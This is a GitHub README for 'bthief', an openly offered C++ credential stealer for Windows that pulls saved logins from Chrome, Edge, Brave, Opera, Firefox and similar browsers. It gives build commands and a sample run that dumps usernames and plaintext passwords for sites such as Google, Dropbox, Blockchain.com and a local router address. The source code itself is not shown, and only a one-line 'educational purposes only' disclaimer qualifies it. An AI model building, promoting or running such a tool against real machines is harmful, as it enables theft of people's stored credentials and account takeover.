/bthief

Web browser credential thief for Windows

Primary LanguageC++MIT LicenseMIT

bthief

A web browser credential thief for Windows.

GitHub Workflow status Codacy grade Latest tag License

Overview

bthief is a web browser credential harvester for Windows, written in C++. It supports Chrome, Chromium, Opera, Brave, Edge, and Firefox.

Building

Requirements: Visual C++ Build Tools and CMake must be installed.

cmake -B build
cmake --build build --config Release

Usage

PS C:\Users\User\bthief> .\build\Release\bthief.exe
[Chrome] FOUND:
  - https://login.blockchain.com
    - Username: [someone@example.com]
    - Password: [Password!]
    - Created: 2022-02-21 17:26:10 UTC
    - Last used: 2022-02-21 17:26:07 UTC
    - Password last modified: 2022-02-21 17:26:10 UTC
[Chrome Beta] NOT FOUND
[Chrome Canary] NOT FOUND
[Chromium] NOT FOUND
[Edge] FOUND:
  - https://www.dropbox.com/login
    - Username: [username]
    - Password: [password321]
    - Created: 2023-07-25 03:51:40 UTC
    - Last used: 2023-07-25 03:51:36 UTC
    - Password last modified: 2023-07-25 03:51:40 UTC
  - http://10.0.0.2
    - Username: [38476682]
    - Password: [123456]
    - Created: 2023-04-12 20:16:49 UTC
    - Last used: never
    - Password last modified: 2023-04-12 20:16:49 UTC
[Brave] FOUND:
  - https://site.com/
    - Username: [username]
    - Password: [qwerty123]
    - Created: 2024-01-28 23:38:26 UTC
    - Last used: never
    - Password last modified: 2024-01-28 23:38:26 UTC
  - https://accounts.google.com/v3/signin/challenge/pwd
    - Username: [person@example.com]
    - Password: [password123]
    - Created: 2024-01-28 23:43:18 UTC
    - Last used: 2024-01-28 23:43:13 UTC
    - Password last modified: 2024-01-28 23:43:18 UTC
[Opera] NOT FOUND
[Firefox] NOT FOUND

Disclaimer

bthief is intended for educational purposes only. Do not use it illegally.

Acknowledgements

Contributors

Dependencies

(These are handled automatically by CMake)